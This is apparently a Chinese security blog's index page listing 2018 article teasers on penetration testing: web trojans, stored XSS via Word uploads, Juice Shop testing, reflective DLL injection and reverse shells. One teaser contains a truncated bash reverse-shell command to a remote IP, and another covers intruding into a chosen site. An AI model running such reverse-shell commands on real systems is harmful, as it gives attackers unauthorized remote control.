关注我们

  • 浅谈互联网挂马与检测技术

    浅谈互联网挂马与检测技术

    0x01 概述在形形色色的互联网中,网站被挂马是非常严重的安全事件,因为这不仅标志着自己的网站被控制,而且还会影响到网站的用户,不管是杀毒软件的“友情”提示还是用户中木马,对网站的信誉都有严重的影响。对于黑客,他们通过网站挂马,可...

    Lzers 黑帽艺术 2018.06.11 399
  • 上传Word文件形成存储型XSS路径

    上传Word文件形成存储型XSS路径

    在渗透测试过程中,每当看到目标测试网站存在上传功能时,总会激起我的好奇心。如果能够走运的话,若目标网站服务器是PHP或ASP架构,而且上传功能没作后缀过滤,这样就能导致可以直接上传反弹脚本形成控制。如果这招行不通,我会尝试上传一个HTML页...

    Lzers 渗透测试 2018.06.10 141
  • 利用Burp Suite对OWASP Juice Shop进行渗透测试

    利用Burp Suite对OWASP Juice Shop进行渗透测试

    1. 简介OWASP 的 在线果汁商店 (Juice Shop) 项目, 是一个很好的开源Web 靶场。它包含了OWASP的10大漏洞 [1], 并且这个项目用到了很多流行的技术如 HTML5, AngularJS, Bootstrap,...

    Lzers 渗透测试 2018.05.21 92
  • 复杂和变态的环境下jsp连接数据库

    复杂和变态的环境下jsp连接数据库

    工具都有,命令不确定,正确执行姿势大家讨论下,或者补充一下工具和代码,1、jsp网站没有写入权限,有执行命令的时候,低权限,为了可以方便快速的读取文件。并且建立数据库连接可以使用小技巧在目标服务器上,搭建一个WEB服务。此WEB服务仅提供菜...

    Lzers 渗透测试 2018.05.15 77
  • 我的渗透测试之道

    我的渗透测试之道

    我做渗透测试也有一段时间了,服务了很多企事业单位,由于我所在的单位性质的关系,也接触到了很多其他公司接触不到的项目,从中也积累了很多的经验。渗透测试怎么做,我也想跟大家分享一下。在很多时候我们面对的总是不一样的客户,不一样的人,在客户关系的...

    Lzers 渗透测试 2018.05.14 172
  • DLL注入新姿势:反射式DLL注入研究

    DLL注入新姿势:反射式DLL注入研究

    在分析koadic渗透利器时,发现它有一个注入模块,其DLL注入实现方式和一般的注入方式不一样。搜索了一下发现是由HarmanySecurity的Stephen Fewer提出的ReflectiveDLL Injection. 由于目前互联...

    Lzers 渗透测试 2018.05.12 206
  • 网络安全渗透测试

    网络安全渗透测试

    针对网络的渗透测试项目一般包括:信息收集、端口扫描、指纹识别、漏洞扫描、绘制网络拓扑、识别代理、记录结果等。下面就一一介绍。信息收集DNSdns信息包含(A, MX, NS, SRV, PTR, SOA, CNAME) 记录,了解不同记录的...

    Lzers 渗透测试 2018.05.12 202
  • 渗透过程中的端口反弹

    渗透过程中的端口反弹

    反弹的各种姿势。bash版本:[sourcecode language="plain"]bash -i >& /dev/tcp/10.0.0.1/8080 0>&amp...

    Lzers 渗透测试 2018.05.11 139
  • 渗透指定站点笔记

    渗透指定站点笔记

    首先,观察指定网站。入侵指定网站是需要条件的:要先观察这个网站是动态还是静态的。首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点 如果是静态的(.htm或html),一般是不会成功的。如果要入...

    Lzers 渗透测试 2018.04.08 119
1